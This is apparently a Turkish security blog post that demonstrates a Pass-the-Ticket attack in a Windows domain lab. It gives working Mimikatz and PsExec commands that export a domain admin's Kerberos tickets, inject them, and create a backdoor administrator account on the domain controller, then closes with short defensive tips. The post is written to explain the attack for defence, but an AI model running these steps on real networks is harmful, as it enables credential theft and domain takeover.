volkan demirci Security

Pass to Ticket

Bu makale, kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Sistemleriniz de güvenlik açığı olduğu zaman aşağıdaki işlemler yapılabilmektedir.

Bu bilgileri yasa dışı bir faaliyet amacıyla kullanmayınız.

Pass to Ticket (PTT), bir hesabın şifresine erişmeden Kerberos biletlerini kullanarak bir sisteme kimlik doğrulama yöntemidir. Kerberos kimlik doğrulaması, uzak bir sisteme yanal hareketin ilk adımı olarak kullanılabilir.

Temel olarak, DC’ye bağlı bir cihaz, kendisi için bir TGT bileti talep ederek DC’de kimliğini doğrular. TGT bileti belirli bir süre geçerlidir ve daha fazla bilet istemek için kullanılır. Elde ettiğimiz ticket’ları Mimikatz araçlarını kullanarak Pass to Ticket işlemini gerçekleştirmek için kullanabilmekteyiz.

Bu makalede bu tür işlemlerin nasıl gerçekleştirileceğini göreceğimiz gibi, makalenin sonunda bu tür işlemlerden kendinizi korumanız için nasıl önlemler almanız gerektiğiyle ilgili bilgilerde yer almaktadır.

Xcopy komutu ile mimikatz dosyalarını, Domain Admin account ile Burak user’ının oturum açmış olduğu PC’ye kopyalıyoruz.

Xcopy /s mimikatz \\PC-7-admin\c$\temp

Psexec \\pc-7-admin cmd

Hostname

Mimikatz’in olduğu klasöre gidilir.

Privilege::debug

Sekurlsa::tickets /export

Dir komutu ile baktığımızda ticketların export edildiğini görüyoruz.

Export edilen ticket’lar local diske kopyalanır.

Xcopy \\pc-7-admin\c$\tools\x64 c:\t1

C:\T1 klasöründeki Domain admin olan Burak’ın dışındaki ticket’ları siliyorum.

Pass to ticket işlemi için mimikatz tekrar çalıştırılır ve aşağıdaki komutlar uygulanır.

Mimikatz

Privilege::debug

Kerberos::PTT c:\t1 ( Ticketların olduğu klasör gösterilir)

Exit komutu ile mimikatz’dan çıkıyorum.

Klist komutu ile domain admin burak’ın ticket’larını kullanabilirliğimi test ediyorum.

Domain admin credential’larına sahip olduğumu DC’nin c diskini listeleyerek test ediyorum.

Standart user olan (domain user) recep account ile DC’nin C diskini listelemek istiyorum.

Yeni bir user oluşturulur.

.\psexec \\dc1 –accepteula net user /add Hallstatt H123456789*

Oluşturulan Hallstatt user’I DC Administrators grubuna eklenir.

.\psexec.exe \\dc1 –accepteula net localgroup “administrators” Hallstatt /add

Hallstatt User’ının Administrators grubuna eklendiği görülmektedir !!!!!!!

İşlem esnasında ATA tarafından gelen alarm bilgisi aşağıdaki şekilde yer almaktadır.

  1. Domain platformunuz da ATA var ise yukarıda yapılan işlemler için aşağıdaki log’ları göreceksiniz.
  2. Anti virüs + EDR + Malware Detection kullanınız.
  3. Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olmulunuz.
  4. Lütfen PAW (high secure workstation) kullanınız.